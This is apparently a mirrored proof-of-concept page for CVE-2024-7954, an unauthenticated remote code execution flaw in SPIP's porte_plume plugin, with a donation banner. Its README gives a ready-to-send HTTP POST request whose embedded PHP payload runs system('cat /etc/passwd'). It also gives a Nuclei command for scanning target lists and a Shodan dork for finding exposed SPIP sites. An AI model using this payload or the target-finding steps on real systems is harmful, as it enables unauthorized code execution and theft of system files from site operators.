Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-7954 PoC — SPIP 安全漏洞

Source
Associated Vulnerability
Title:SPIP 安全漏洞 (CVE-2024-7954)
Description:SPIP是SPIP开源的一个用于创建 Internet 站点的免费软件。 SPIP存在安全漏洞,该漏洞源于容易受到任意代码执行漏洞的影响,远程未经身份验证的攻击者可以通过发送精心设计的HTTP请求以SPIP用户身份执行任意PHP。
Readme
# RCE_CVE-2024-7954
<h2><b>Description:</b></h2>

The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. (CRITICAL)

<h2><b>Exploit:</b></h2>

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB


<h2><b>Used Tool:</B></h2>

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

<h2><b>Shodan Dork:</b></h2>
app="SPIP"

<h2><b>Reference:</b></h2>
1) https://github.com/fa-rrel
File Snapshot

[4.0K] /data/pocs/b060afb59cf887117bb00944404e4a0d5c807ec6 ├── [1.8K] CVE-2024-7954.yml └── [ 711] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.